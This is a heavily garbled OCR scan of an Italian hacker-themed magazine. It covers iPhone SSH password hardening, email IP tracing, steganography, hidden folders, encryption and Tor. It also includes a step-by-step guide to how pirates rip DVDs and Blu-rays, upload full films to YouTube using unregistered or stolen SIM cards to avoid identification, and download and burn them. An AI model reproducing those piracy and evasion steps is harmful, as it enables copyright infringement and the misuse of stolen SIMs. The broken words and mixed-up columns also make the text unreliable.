il file DB, potrà vedere in chiaro tutti gli SMS della 
vittima. Un gioco da ragazzi per lui 1 


Hd ecco quindi l’opportu- 
funziona questa 
per imparare a 
smartpho- 
usioni non 
autorizzate. 


BASTA POCO PER PROTEGGERE 
IL PROPRIO IPHONE 


Come già detto, la tecnica di at¬ 
tacco analizzato nei passi del tu- 
torial funziona soltanto se sullo 
smartphone di casa Apple è attivo 
il servizio di rete SSH per le comu¬ 
nicazioni on-line (basta installare 
l'app OpenSSH per abilitarlo au¬ 
tomaticamente) e, soprattutto, se 
l'utente non ha mai modificato la 
password utilizzata come protezio¬ 
ne per l'esecuzione delle applica¬ 
zioni installate nell'iPhone stesso. 
Per proteggere i nostri dati perso¬ 
nali, quindi, è opportuno cambia¬ 
re il prima possibile le credenziali 
d’accesso alla memoria interna del 
proprio smartphone. Per compiere 


questa operazione, occorre av¬ 
viare il terminale (magari instal¬ 
lando e usando un'app come 
iSSH o Prompt). Dal prompt dei 
comandi digitiamo passwd e 
scriviamo la nuova password. 
Eseguiamo quindi anche il 
comando passwd mobile 
e scegliamo un'altra pas¬ 
sword. Fatto questo, chiù 
diamo il terminale. Que¬ 
sta operazione ci mette 
al riparo da eventuali 
attacchi il cui scopo 
è quello di accedere 
alla memoria interna 
dell'iPhone! 


DALLE-MAIL ALL'IP 

Nel Passo A3 abbiamo 
visto quanto è facile per 
un pirata risalire all'IP di 
chiunque semplicemen 
te inviandogli un e-mail: 
ogni messaggio, infatti, 
si porta dietro anche 
tutte le informazioni 
utili sul mittente e tra 
queste, in particolare, il 
provider utilizzato e l'in¬ 
dirizzo IP. Ma in questo 
modo, quindi, chiunque 
potrebbe scoprire anche 
l'indirizzo IP di un pira¬ 
ta! In linea di prindpio 
sì, ma chiaramente un 
eventuale malintenzio¬ 
nato non userebbe mai 
la propria e-mail per 
contattare la vittima, 
ricorrendo invece ad uno 
dei tanti servizi on-line 
come Anonymailer.net 
che permettono di in¬ 
viare le cosiddette falce 
e-mail, doé messaggi 
temporanei e completa¬ 
mente anonimi! 
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Pay TV in chiaro 
su Youlkibe! 


Film, serie TV, sport e cartoon: oltre 100.000 titoli sono già on-line. 
C’è chi sa come guardarli su PC e TV senza abbonamento! 


P oco più di un anno fa, per condividere 
filmati su YouTtibe bisognava sottosta¬ 
re a rigide limitazioni che riguardava¬ 
no durata (10 minuti) e dimensione massima 
(1 GB). Con l'avvento dell'alta definizione il 
lltbo è stato "allargato” per consenti re kipload 
di file fino a 2 GB e con durata massiina i 
minuti. Poco dopo, è iniziato un progPa^Fi 
che abbatteva del tutto le barriere, riserva 
dolo però solo a determinati account. (fra che 
i test sono terminati, insieme ad altre novità 
promosse nella nuova versione di YouTube, la 
rimozione dei limiti non ò più un privilegio per 


pochi. Espletando una semplice formalità che 
prevede la registrazione di un numero di cellu¬ 
lare da associare al nostro account perricevere 
un cod ice d i verifica utente, possiamo sbloccare 
lo spazio su YouTube e predisporlo per l'upload 
di filmati che possono durare 12 ore o pesare 
20 GB. Potremo cosi condividere i video senza 
^iinl dilemma di decidere quali parti tagliare 
ptj^neno sacrificare la qualità del video. 

ola ai pirati 

i fcibe era possie¬ 
dati i limiti 




QUESTIONE DI 
REPUTAZIONE 

Se ci logghiamo a You¬ 
Tube, ma non notiamo 
la presenza del collega 
mento Aumentai! tuo 
limito (Passo Al), significa 
che l'account è ritenuto 
sospetto, in quanto in 
passato ha ricevuto se¬ 
gnalazioni per violazioni 
del copyright. Per averne 
la conferma basta accede 
re alle impostazioni, spo 
stani in Otstnci account 
e controllare la sezione 
Stato dell'account. 

OGNI IMPRONTA 
E UNA TRACCIA 

Utilizzando la tecnologia 
FingerprintAudioTracks. 
lo strumento di carica¬ 
mento dei video dì YouTu¬ 
be è in grado di rilevare 
l'eventuale presenza di 
contenuti audio protetti 
da copyright, rimuovendo 
in automatico il contenu 
to sonoro dell'intera clip. 



imposti, erano frammentate in clip di 15 mi¬ 
nuti e racchiuse in playlist per facilitarne la 
riproduzione, ora i pirati orfani di Megavideo 
non devono nemmeno complicarsi la vita per 
sminuzzare i video: basta una semplice ricerca 
usando la parola chiave 'Tri m completo” (o full 
movie) per notare quanti contenuti siano già 
disponibili sul portale o diffusi in giro tramite 
Eacebook e Twitter. Inoltre, poiché è molto 
semplice prelevare i video da YouTube, non 
ci vuole molto perché questi finiscano sul PC 
dello scroccone di turno che, in barba alla 
legge, può anche masterizzarli mettendoli 


0 Un accoun 



za limiti 


Lo sblocco dell’account YouTube avviene tramite l'inserimento di un codice personale che 
sara recapitato via SMS sul nostro telefono cellulare. Ecco la procedura corretta da seguire. 
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^ Aumentiamo il limite 

■j Colleghiamoci all'indirizzo www.winmagazine.il/ 
—J imk/1343. Effettuiamo il login utilizzando i dati del 
nostro profilo YouTube (se non ne abbiamo uno cucchiamo 
Registrati per crearlo) e cicchiamo Aumenta il tuo limite. Digi¬ 
tiamo il numero del nostro cellulare e cicchiamo su Invia. 


+ Una semplice form alità 

2 1 Un messaggio SMS spedito da Google al nostro nume- 
,r.J ro di cellulare conterrà il codice di verifica. Digitiamo¬ 
lo nel campo Inserisci il tuo codice e clicchiamo su Verifica. 
Ritornati alla pagina di caricamento dei video, un messaggio 
ci avviserà che lo sblocco è avvenuto con successo. 
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| Pay TV in chiaro per tutti! | ki e Mnartpnone degli HacKer^r 


a YouTube: nuova veste grafica 

Sotto un look tutto nuovo si nasconde la vera vocazione sociale di YouTube, che permette alle nostre creazioni 
di diffondersi velocemente in tutto il Web. Vediamo in che modo. 



-t Come tu lo vuoi 

*| . Giochiamo sul pulsante 

nostro nome utente (in alio VP 
e scegliamo Impostazioni Spostando' 
Impostazioni profilo possiamo personalizzare 
il nostro canale aggiungendo una foto o pub¬ 
blicando qualche intormazione che ci riguarda 
(Salva modifiche ) 



^ L'unione fa la forza 

2 Spostiamoci nella sezione Condivisio- 
ne e utilizziamo i collegamenti Connetti 
jvi a Twitter o Facebook. In entrambe i casi 
fidente loggarsi al nostro profilo regi¬ 
stro jpiiocial netvwk in questione e confer¬ 
mare {Coibenti o Autorizza App ) il collegamen¬ 
to a YouTube. 



Googie non poteva mancare 

3 * Torniamo alla home page di YouTube e 
•J completiamone la dotazione sociale clic- 
cando su Upgrade account. Digitiamo il nostro 
nome e cognome nei rispettivi campi, indichia 
mo il sesso e confermiamo cliccando Upgrade. 
Questo passaggio abbina il nostro account a un 
profilo Google+ 



E adesso si pu 



Il nostro account su YouTube è ora pronto per accogliere le nostre creazioni 
o dimensioni, condividendole automaticamente con i nostri cari. 


il video 

video, senza più limiti di durata 



^ Qualche piccolo ritocco... 

■J , Nonostante non siamo più soggetti a limiti, 
- ■ qualche ritocco ai filmati è sempre necessa¬ 
rio. Usando Windows Live Movie Maker (www wmma- 
gazine.it/link/1344), possiamo tagliare o aggiungere 
musica, titoli e transizioni al filmato salvandolo in un 
formato digeribile da YouTube (ad esempio WMV). 


* ...e siamo pronti 

2 Accediamo alla pagina principale del nostro 
account e clicchiamo Carica Video. temia¬ 
mo su Seleziona file dal tuo computere indichiamo 
con Apri la cartella di archiviazione sull hard disk del 
video da caricare. In alternativa, possiamo avviare 
l’upload del file trascinandolo nella pagina. 


▲ Condividiamolo con tutti 

3 Intanto che il file viene caricato, assegnia¬ 
mogli un Titolo e una Descrizione , mdichia 
mo la categoria di appartenenza e facilitiamone la 
ricerca indicando le parole chiave (Tag). Ultimato 
l'upload, il video sarà immediatamente condiviso 
sui nostri profili Facebook. Twitter e Google+. ► 
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Ili 


Il Tubo visto dai pirati 


UPLOAD AL SICURO 

U capacità di riprende¬ 
re gli upload interrotti 
è il motivo per cui nel 
nuovo YouTube è stato 
accantonato lo stru¬ 
mento di caricamento 
in flash a favore di 
quello scritto in Java. 
Ora, infatti, se cade la 
linea mentre stiamo 
caricando un file sul Tu¬ 
bo, riavviando l'upload 
del medesimo file esso 
riprenderà dal punto in 
cui il caricamento si è 
interrotto. Tale possibi¬ 
lità è riservata solo agli 
utenti che utilizzano 
ibrowserChrome, 
Firefox e Internet 
Explorer con Silvertight 
installato. 

DOWNLOAD A 
PORTATA DI CLIC 

Di strumenti per scari¬ 
care video da YouTube 
ne esistono a decine, 
tuttavia per rendere 
più agevole il download 
del file, i pirati si colle¬ 
gano a Keepvid (www. 
keepvid.com), incollano 
il link YouTube della pel¬ 
licola appena caricata, 
(ficcano su Download 
quindi copiano il link 
dalla barra degli indiriz¬ 
zi e lo inseriscono nella 


La differenza tra un utilizzo legale e illegale di YouTube, sta nel numero di cellulare utilizzato 
per sbloccare l’account e nel materiale condiviso. DVD e Blu-Ray sono le fonti più gettonate. 



^ P rofilo camuffato 

•| i Collegatosi a YouTube, il pirata clicca Crea accounte for- 
- • ; nisce dati che non siano riconducibili alla propna identità. 
Con Taccountjppena creato si collega al profilo, clicca Carica 
video, Alimi 'ntù limaùmitee richiede il codice usando una SIM 
non registrat^ii|^l , .imuìstata all'estero). 
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A.| I ferri del mestiere 

2 l H profilo privo di limiti e informazioni personali è pronto: 
.. .J è giunto il momento per il pirata di preparare il materia¬ 
le da condividere La scelta ricade su DVD e Blu-Ray, ma prima 
è necessario trasformarli in file video. Lo strumento adatto per 
l’operazione è HandBrake (wvm.handbrake.fr). 


^ Download e installazione 



Il giusto compromesso 


descrizione del video. 

EDITOR VIDEO 
YOUTUBE 

Dotato dello stretto ne¬ 
cessario, l'Editor video 
YouTube offre strumenti 
per personalizzarci 
filmati caricati nel pro¬ 
prio account. Con esso 
è possibile montare o 
tagliare le clip e inserire 
transizioni, effetti video 
o tosti. É inoltre possibi¬ 
le attingere allo stermi¬ 
nato database di filmati 
e tracce audio condivise 
su YouTube con licenza 
Creative Commons e uti¬ 
lizzarle per i montaggi, 
l'accesso all ’editor è di¬ 
sponibile nella sezione 
Gestione video. 


3 Dalla sezione Download scarica la versione adatta al 
1 sistema operativo usato e installa il software. Inserito il 
disco dei film nel lettore ottico del PC, avvia HandBrake, dal 
menu Source seleziona il percorso del supporto e in Title impo- 
t sta la traccia da estrarre (quella dalla durata maggiore). 



^ È tempo di upload 

g II pirata toma nella pagina Carica Video di YouTube, clicca 
Seleziona File dal tuo computer indica il percorso del file 
creato con HandBrake e clicca Apri. Intanto che il file viene caricato, 
il pirata sceglie un titolo per il video che comprenda la dicitura Film 
completo e lo lagga con i nomi dei protagonisti per renderne più 
semplice la ricerca. Ultimato l'upload, clicca Condividi. 


4 II pirata clicca Browse digita un nome e indica il per- 
. corso di salvataggio (Salva) Spuntata Web optimized , si 
sposta in Video, spunta Target Size e digita 1200 per ottenere 
un video di discreta qualità e che sia rapido da caricare su You¬ 
Tube. Un clic su Start avvia l’operazione. 


T ®Tltl.'S10HtST 

• 1 2 

3 4 5 

+) iQcm 

_1 


a PLAY/PAUSA 

Permette di avviare o interrompere 
la riproduzione del video 

a AUDIO 

Regola il volume o disattiva l'audio 

E3 CAMBIA QUALITÀ 

Se disponibili, possiamo scegliere le 


diverse nsoluziom del video 

E> RIDUCI/ESPANDI 

Attivano la visualizzazione ingrandita 
del video 

a SCHERMO INTERO 

É possibile riprodurre il video anche 
a schermo intero 
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| Pay TV in chiaro per tutti! 


PC e Smartphone degli Hacker f * 1 


così al riparo da eventuali ri mozioni. Ma come 
fanno i pirati a pubblicare interi film senza es¬ 
sere beccati? Innanzitutto creano un account 
"anti intercettazione" che sbloccano utilizzando 
un nu mero di telefono associato ad una SIM non 
registrata o, in alcuni casi, addirittura rubata. 
Quindi, provvedono, anche a convertirei film 
registrati dalle Pay TVo rippati dai DVD video 
nei formati compatibili con YouTube (FLV e 


MPKG, oppure MP4 per i video in alta definizio¬ 
ne), prestando attenzione a non superare i limiti 
delle2ore o dei 20 GB di dimensione. In seguito, 
creano un link per consentirne il download 
agli altri utenti. Per farlo, utilizzano un servizio 
on-line tipo il famoso www.keepvid.com. Non 
contenti di ciò, i pirati provvedono anche a 
pubblicare questo link sui social network. Ma 
ovviamente non si fermano solo ai contenuti 


cinematografici e TV! Per gustarsi anche lo 
sport a costo zero puntano il browser sul sito 
http://videa.hu su cui vengono pubblicate tut¬ 
te le partite di calcio del campionato italiano 
pochi minuti dopo il fischio finale. Tutto que¬ 
sto ci sembra fantascientifico? In redazione 
abbiamo deciso di fare la classica "prova del 
9”, scoprendo retroscena che hanno davvero 
dell’incredibile! 


100 % 

ILLEGALE 


Film pronti per la visione 


Le pellicole condivise non restano su YouTube in eterno. Prima o dopo queste saranno rimosse.-oli scrocconi 
lo sanno ed ecco perché provvedono a scaricarle e masterizzarle prima che ciò avvenga. 



> Un ricco database 

■J Arrivati su YouTube è sufficiente effettua- 
:/ re una ricerca inserendo il termine Film 
completo I risultati comprendono pellicole di ogni 
genere pronte per lo streaming. Il pirata clicca su 
uno dei risultati, quindi copia il link presente nella 
barra degli indirizzi e punta il browser all'indirizzo 
www.keepvid.com. 


.a Solo il meglio 

2 Incollato il link nella casella Enter video 
URL. il pirata clicca Download, acconsen¬ 
te all’esecuzione di Java ( Eseguilo questa volta) 
e conferma con Esegui Pochi secondi e il servizio 
restituisce i link per scaricare il video in tutti i for¬ 
mati e le risoluzioni disponibili. La scelta ricade su 
Download MP4 720p (o 1080p). 


-jL Un archivio di malefatte 

3 Non contento di riprodurre la pellicola “solo” 
sul proprio PC, il pirata apre il menu Start7 
Tutti i programmi/Windows DVD Maker (o un 
altro programma per la masterizzazione dei video) 
e segue la procedura che trasferisce il file su un 
supporto ottico riproducibile dai comuni DVD Pla¬ 
yer collegati alle TV! 


LA GUIDA TV DIRETTAMENTE SUL TUO SMARTPHONE 


L'elenco di tutti i film completi in lingua 
italiana disponibili su YouTube, costante- 
mente aggiornati e catalogati a dovere: 
questo è quanto offre Film OnLine, un'ap¬ 
plicazione gratuita disponibile per tutti i 
dispositivi Android. Per trovarla e instal¬ 
larla, al pirata basta una semplice ricerca 
nell'Android Market (usando come termine 
Film OnLine) e un tap sul pulsante Gratis 
(Accetta e scarica). Dopodiché si accerta 
che la connessione Internet sul dispositivo 
sia attiva, quindi si sfoglia l'elenco dei vi¬ 
deo tappando sul collegamento Film per 
tutti. Un tap avvia la riproduzione del film, 
mentre la pressione prolungata sul titolo 
della pellicola apre un menu che consente 
la condivisione del link tramite e-mail, 
Facebook, Twitter o SMS, oltre l'accesso a 
ulteriori info riguardanti il film. 


I 4’ A O ^ .,ll • 00:58 

^ Applicazioni 

Film OnLine (italiano) 

BiucmEi ■■■ 


O „il W 00:58 B .J> A "? 

android apps download froo 

V “\ • .•'.ti chi ■ Ir 

Amimi Gcogle 

ne (italiano) Film In elenco: 493 
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**★♦4 1 Su* 

1 00.000+ download 



* f 1,3K persone hanno fatto ♦ 1. 

DESCRIZIONE 

Un elenco organizzato e piacevole di film 
completi in italiano, da vedere in streaming 

V •’ " r 1 


♦ Animazione 

♦ Commedia 

♦ Documentari 

♦ Drammatico e Azione 

• Al di là delle nuvole 

» Assassinano?) Tango 

• BertinC^JIing 

• Black Hawk Down 
‘ Blow 


r - -r II ni 1 i ■ .... .. 

Q Assassinatlon Tango 

“1 

Play 


| Wikipedia 


IMdb 


Cerca Trailer 

« 

Cerca Locandina 


Condividi 


g Segnala link non valido 

■munito 







































































Dati a prova 
d’intercettazione 

Così proteggi i documenti memorizzati sul tuo disco 
rigido e ne rendi impossibile la lettura ad occhi indiscreti 


Cosa ci 
occorre 

T001.0I 

STEGANOGHAFIA 

STEGANOIMAGE 

Gratuito 

. SitolntKrmrt 

http://steganoimage. 

sourceforge.net 


SOFTWARE 
\ Di SICUREZZA 

HIDE FOLDERS 

Guani.- : Gratuito 

Sito Internet 

www.hidefoktens.org 


C hi utilizza il PC per conservare 
documenti e, in generale, file 
personali, deve tenere molto 
in considerazione il fattore sicurez¬ 
za. Può succedere, ad esempio, a 
casa o in ufficio, di lasciare il com¬ 
puter incustodito e a disposizioni 
del primo curioso di passaggio Ce¬ 
sia un collega o un familiare poco 
importa), pronto a sbirciare tra i 
nostri file personali. Per evitare ciò 
basterebbero invero alcune piccole 
accortezze, come ad esempio, quel¬ 
la di abilitare uno screen saver che 


si attivi dopo qualche minuto che 
ci si è assentati dalla postazione 
e che richieda l'inserimento della 
password, oppure quella di proteg¬ 
gere le cartelle con i documenti più 
importanti o le immagini più perso¬ 
nali. Windows 7 consente di cifra- 
! e cartelle, ma non sempre la 
Illùdi immediataattuazio- 
ne.^c^Ku$l>4)oltre trovarci nella 
necessità file c documenti 

in modo tale ch^su^^to il «tosti- 
natario sia in gradoni irit?rpijFt#e 
correttamente le informàzion iace 



vute. In questo caso però Windows 
non può venirci in aiuto. La migliore 
cosa da fare è, in questi casi, quella 
di utilizzare software di terze parti 
come Steganolmage, che consente 
di nascondere dei file all'interno di 
immagini, Hide Folders, che rende 
"invisibili" intere cartelle, e Enc- 
ryptOnClick, ottimo per protegge¬ 
re con una password file e cartelle 
utilizzando un fortissimo algoritmo 
di cifratura (AES a 256 bit). Cosa 
aspettiamo allora? Vediamo subito 
come utilizzarli al meglio! 


TOOL a CRITTOGRAFIA 

ENCRYPTON 

CUCK 

tkiantu» ; Gratuito 

Sito intorni 

www.2bnghtsparks.com 


□ Nascondi tutto in 


Utilizzando il programma Steganolmage possiamo includere uno o più file impoi 
di una qualsiasi immagine in formato PNG in i 



i all’interno 

modo da proteggerli ih modo sicuro da sguardi indiscreti. 



CuraptolNig Uni Steganolmage 
Setup Wizard 

Cfc*n£>Ki*a» •'»«»« 


□E r 


>— SS- S- 


- 25- 55-. 


gunto * * Mttxto <mm ni 


^ Installiamo il software 

■| j Scompattiamo sul disco rigido l'archi- 
— vio compresso Steganolmage.zip (lo 
trovi sul CD-Rom) e facciamo doppio clic sul 
file Steganolmage-1.0-setup.exe. Seguia¬ 
mo la procedura guidata: al termine lasciamo 
selezionato Run Steganolmage e clicchiamo 
su Finish 


Cosa vogliamo 
? nascondere?^ 


. -J Avviato il software, carichiamo l'immagi¬ 
ne (in formato PNG) che conterrà il testo (o il file) 
da nascondere. Digitiamo in Message il testo, 
mentre con Add file includiamo i file da incorpo 
rare nella foto. Digitiamo una password in Enc- 
rypt Key e premiamo Embed 


+> Ora scrutiamo dentro 
Timmagine 

—J La procedura per leggere il contenuto di 
un file creato con Steganolmage è molto faci¬ 
le. Con Load carichiamo il file, digitiamo quindi 
la password che ne protegge il contenuto. Clic¬ 
chiamo quindi su Exract per visualizzare il testo 
nascosto e gli eventuali file incorporati. 
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| Proteggi tutti i tuoi file | ri e ^manpnone aegii nacKerv 



Le cartelle non si vedono più! 

Se al nostro computer accedono più utenti, la cosa migliore da fare per proteggere le cartelle che contengono 
file personali è quella di renderle invisibili. Servendoci del tool Hide Folders bastano pochi clic! 
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^ Prima di tutto la password 

■J : Estraiamo dall'archivio 
mj zip (lo trovi sul CD-RomU 
folders-setup.exe ed eseguiamo!» 
to e avviato il software, clicchiamo su, 
selezioniamo la cartella da nascondere. Clic 7 
cando su Password indichiamo la password 
per la cartella. 



^ Nascondiamo le cartelle 

2 ■ Per nascondere una cartella (e le sue 
- " sottodirectory) clicchiamo su Hide. Se 
raggiungiamo con Esplora risorse il percorso 
i si trova la cartella noteremo che essa non 
ibile Per accedervi da Hidden Folder 
cli(Sffi^pa|QI destro sulla cartella e sceglia¬ 
mo Open « 



^ Visibile, ma solo per pochi! 

3 \ Per visualizzare nuovamente il contenu- 
to della cartella appena nascosta, basta 
selezionarla dall'elenco della pagina principale 
del programma e cliccare sul pulsante Unhide 
Immessa la password corretta, la cartella e il 
suo contenuto saranno nuovamente accessibili 
da Windows. 


Chiudi i file in cas 

Per mettere al sicuro documenti e cartelle che contengono informazioni im[ 
è proteggerli ricorrendo alla crittografia. Con EncryptOnClick possiamo farlo in 



ami la cosa migliore da fare 
modo semplice e veloce. 



a ] P roteggere un file o una cartella 

■j ? Eseguiamo il file EncryptOnClick Setup.exe contenuto nell'archi¬ 
vio compresso EncryptOnClick.zip (presente sul CD-Rom). Avvia¬ 
to il software, in Encypt premiamo File (o Folder). selezioniamo il file (o 
la cartella) da criptare e digitiamo la password. Il file criptato avrà esten¬ 
sione .eoe. 


▲ Tutto di nuovo in chiaro 

’ Per decriptare un file con estensione .eoe clicchiamo due volte su 
di esso (in alternativa avviamo il programma EncyptOnClick e in 
Decrypt clicchiamo su File o Folder) e digitiamo la password di sblocco. 
L'estensione originaria del file verrà ripristinata e potremo quindi accedere 
normalmente al suo contenuto. 
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Paura di essere spiati? Con le nostre dritte e il software 

giusto possiamo navigare come fantasmi della Rete 


La maschera per 
essere anonimi 


Cosa ci 
occorre 

SOFTWARE PER 
NAVIGARE ANONIMI 

TOR BROWSER 

Gratuito 

Sito Internet: 

www.tDrproject.org 


D iverse volte abbiamo affrontato il de¬ 
licato tema dell’anonimato sul Web: 
sempre più siti raccolgono, infatti, le 
nostre informazioni personali col rischio 
che vengano condivise in Rete. Come ben 
sappiamo, quando navighiamo siamo iden 
tificati nel grande mare di Internet nJ^djjjnte 
un indirizzo IP univoco. È un po' c 


tuare unachiamata: il destinatario (nel caso 
specifico il sito Web raggiunto) è in grado di 
conoscere il nostro nu mero (l’I P) ed eventual 
mente localizzarci su una mappa geografica. 
E se riuscissimo a cambiare l'indirizzo IP, 
facendo perdere le nostre tracce in giro per il 
mondo? Se ci sembra fantascienza, sbagliamo 
di grosso: la soluzione c’è e si chiama Tor 


Browser, il softwareche permettein pochi clic 
di navigare in maniera totalmente anonima 
perché non solo è in grado di nascondere il 
nostro indirizzo IP, ma addirittura anche di 
mascherare il traffico Internet generato dal 
browser stesso: in pratica, è come diventa¬ 
re davvero fantasmi della Rete! Scopriamo 
dunque come procedere. 



SEMPRE PRONTO 
ALL'USO 

Tor Browser Bundle è 
distribuito in versione 
portable: dò vuol dire 
die possiamo tenerne 
sempre una copia sulla 
nostra inseparabile 
pendrive, pronto ad 
essere avviato su qual¬ 
siasi PC. Non dovremo 
installare nulla e la 
nostra configurazione 
personale viene co¬ 
munque salvata senza 
doverla rifare ad ogni 



Downlo ad del softwar e 

Dal Win CD-Rom scompattiamo l'archivio compres¬ 
so TorBrowser.zip in una qualsiasi cartella del nostro 
disco rigido Al termine, accedendo al contenuto di 
questa nuova directory, troveremo il file di installazione di 
, Tor Browser, 


Avviamo Tor Browser 

Cucchiamo due volte sul file tor-obfsproxy-browser- 
bundle-2.3.12-4-en-US.exe: si tratta di un archivio 
autoestraente e quindi creerà una nuova cartella Tor 
Browser Accediamo al suo contenuto e cucchiamo due volte sul 
file Start Tor Browser pei avviare il software. 



avvio. Il nostro consi¬ 
glio è dunque sempre 
quello di tenere una 
copia di Tor Browser 
a portata di mano, 
specialmente in quelle 
situazioni un cui il pe¬ 
ricolo è sempre dietro 
l'angolo: pensiamo, ad 
esempio, alle volte che 
potremmo collegarci 
ad unhotspotWi-Fi 
pubblico o a reti senza 
fili prive di protezione, 
magari durante le no¬ 
stre vacanze in Italia e 
all'estero. 



Connessione come Client! 

Verrà cosi mostrato il pannello di controllo Vtdaha: cuc¬ 
chiamo subito sul pulsante Settmgs per cominciare a 
personalizzare le impostazioni del nostro nuovo proxy 
anonimo. Spostiamoci nella scheda Sharing e da qui selezionia¬ 
mo l'opzione Run ad a Client only 



Regole per il firewall 

H Se sul nostro PC è installato un firewall che lascia attive 
solo alcune porte, spostiamoci in Network e abilitiamo 
l 'opzione My firewall only lets me connect to certain 
ports. Compiliamo il campo Allowed Ports inserendo quelle 
ammesse (nel caso in figura, \'80e la 443). 
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Una lingua più familiare 

La lingua predefinita per l'interfaccia utente di Vidalia è 
l’inglese. Per cambiarla, spostiamoci nella scheda Appe- 
arance (sempre presente in SettingS) e selezioniamo dal 
menu a tendina Language l’opzione Italiano Possiamo inoltre 
cambiare lo stile grafico da Style. 
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Impostazioni avanzate 

Terminiamo la configurazione preliminare di Vidalia spo¬ 
standoci nella scheda Avanzato. Nella sezione Control¬ 
lo di Tor verifichiamo che sia attiva l’opzione Utilizzo di 
una connessione TCP (ControlPort) e selezioniamo Configura 
la porta di controllo automaticamente. 




< onera(uhirions. Your brnnwr 1 * configured to ose l'or. 


I hvrc ii « mh'uHiy updxir minìIaMi* fu» ri»»- lur llrtmur Mutuile. 

C Ikk bere t<» e» to thè downMtl nagc 





... con Moziila Firefox! 

La buona riuscita dell'operazione verrà confermata da 
un messaggio nella pagina aperta automaticamente in 
Firefox, Nel campo YourIPaddressappearstobe com¬ 
pare l'indirizzo IP acquisito dalla rete Tor che è diverso da quello 
assegnatoci dal nostro Internet Provider. 



Condividere è bello! 


a Se vogliamo condividere la nostra rete (ed in particolare » 
l’indirizzo IP reale, che quindi verrà usato per qualcun’al- 
tro) con gli altri utilizzatori della rete Tor, spostiamoci in 
Condivisione e selezioniamo Aiuta gli utenti sotto censura a 
raggiungere la rete Tor. 


j, - TnrveUo di convoco V>da6a f. 

il iltf iUi SppSiriB 1 

Stato 

Stato di avwo non riconosciuto 


mrnmm 

Shortcutd VTdaha 


^^jj^Fema Tor 

♦ ff 

Configuratone del relayngVi 

iàMtat 

£ J&k 

k. -3S8 Mostra la rete 

Usa una nuova identtà 

B. Grafico deiTamptezia e* banda Aiuto f# informazioni su 


E adesso si naviga... 

Clicchiamo sul pulsante OK per ritornare al Pannello di 
controllo Vidalia. Clicchiamo su Start Tor per provare a 
stabilire una nuova connessione nella rete anonima: 
l’operazione dura qualche secondo, al termine del quale si avvie¬ 
rà automaticamente Mozilla Firefox. 




ANCHE PER 
LINUX E MAC 


Se, oltre ai nostro ama¬ 
to Windows, utilizziamo 
anche una qualsiasi di¬ 
stribuzione GNU/linux 
(come Ubuntu) osiamo 
in possesso di un Mac, 
possiamo difendere 
ugualmente il nostro 
anonimato. Raggiun¬ 
gendo infatti il sito Web 
www.torproject.org 
possiamo procedere al 
download di Tor Brow¬ 
ser anche per le altre 
piattaforme software. 

Il principio di funziona 
mento e configurazione 
preliminare è pressoché 
identico. 


OCCHIO ALLA 
CONDIVISONE! 


Se abbiamo deciso di 
far parte di uno dei nodi 
della rete Tor, ovvero 
vogliamo condividere 
la nostra connessione 
con gli altri membri 
della Rete, forse è 
bene prestare un po' 
d'attenzione in più. In 
questo caso, infatti, il 
nostro reale indirizzo 
IP verrebbe condiviso 
con gran parte della 
rete Tor: spesso, per 
evitare di essere scova¬ 
ti, i malintenzionati si 
connettono al Web uti¬ 
lizzando questa tecnica. 
Nel commettere il reato 
telematico, qualcuno 
potrebbe pur sempre 
risalire al nostro indi¬ 
rizzo IP e dimostrare 
la nostra estraneità ai 
fatti non sarebbe cosa 
da poco. 


In giro per il mondo 

S A Se vogliamo avere fina chiara visione dello stato della 
J| nostra connessione, ritorniamo al Pannello di controllo 
m Vidalia e clicchiamo sul pulsante Mostra la rete appare 
l'intero percorso della nostra connessione che, come possiamo 
vedere, fa davvero il giro del mondo! 
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Una giornata 
da hacker 

Con un piccolo aiuto abbiamo 
provato tecniche di attacco 
“proibite”. Ecco i retroscena 




Cosa ci 
occorre 

simulazione 

Oi KACK9J0 

MOTHER 

i . iv ►'CO 


SOFTWARE COMPLETO 


Interni www. 
4ttemar.net/projects/ 
xphp 
alcune 


irare ( 
di compatì 
questi casi utilizzi^ 
la versione Mottier 
ZerOS, scaricabile 
gratuitamente da 
www.winmagazine.it/ 
link/1054. La procedura 
di utilizzo è comunque 
identica a quella 
mostrata nel tutoria). 


C e l'abbiamo fatta: abbiamo vissuto sulla 
nostra pelle l'esperienza di diventare ha¬ 
cker per un giorno, accompagnati da uno 
dei migliori esperti sul campo, che si è prestato 
a farci da cicerone in questa folle avventura. 
Perché diventare un hacker, uno di quelli seri, 
è difficile, richiede tempo e preparazione, (.osi, 
per chi non ne ha, non resta che affidarsi a uno 
del mestiere, seguendolo nella sua giornata-tipo. 
Ventiquattr'ore fatte di studio dei sistemi altrui, 
scelta di un obiettivo, pianificazione dell'attacco 
e, per non farsi mancare nulla, accesso anoni¬ 
mo e ovviamente non autorizzato al computer 
^ delljf ittima! 

La cassetta degli attrezzi 

Come imiijn i avventura che si rispetti, per go¬ 
dersela fino in fondo, però, c'è una dotazione 
di base da possedere. E non parliamo tanto 
di nozioni tecniche, difficilmente acquisibili 
in poco tempo, quanto piuttosto di software: 
programmi, insomma, utili alle missioni di un 
hacker. Di solito, tutti questi strumenti vengono 
raccolti nel corso degli anni, scrupolosamente 
catalogati e costantemente aggiornai i, proprio 
come si trattasse di un'officina coi ferri del me¬ 
stiere per un meccanico. In realtà, ci spiega Ke¬ 
vin (nomedi fantasia sceltodall'hacker in onore 
di Kevin “Condor” Mitnick, senza ombra di 
duhhio il più famoso program motore, phreakor, 
chracker, hacker e ingegnere socia le della storia 
dell’informatica), un hacker deve essere in grado 
di recuperare lo stru mento giusto al momento 
giusto. Anche lontano dal proprio computer, e 
senza avere a disposizione la classica “chiavetta 
USB dei miracoli", che l’hacker utilizza come 
valigetta degli attrezzi. È per questo che uno dei 
primi passi consiste proprio nella selezione di 
programmi e utility. Solo dopo aver completato 
questa fase cruciale, l’hacker entra finalmente 
in azione! 






| Hacking } 


ri e smartpnone aegn Hacker v 




■ Il progetto Tor (www.torproject.org) permette di 
far perdere le proprie tracce su Internet e navigare 
anonimi. 


Microsoft, comunque, vanta molti pro¬ 
grammi utili agli hacker ed è per questo 
che il nostro geniaccio apre una pagina di 
Firefox, browser delezione nell'under¬ 
ground informatico. La prima puntatina 
la fa sul sito del progetto Tor (www.tor- 
project.org). fi un programma utile per far 
perdere le proprie tracce mentre si naviga. 
In pratica, si basa sul passaggio dei dati 
scambiati su Internet tramite nodi (cioè 
server) intermedi: per visitare un determi¬ 
nato sito, si passa attraverso un'ampia re¬ 
te di altri computer, sparsi per tutto il pia¬ 
neta. Cosi, chi tenta di risalire all’origine, 
dovrebbe, in teoria, ricostruire questo lun¬ 
go e intricato percorso. Hd è un’operazione 


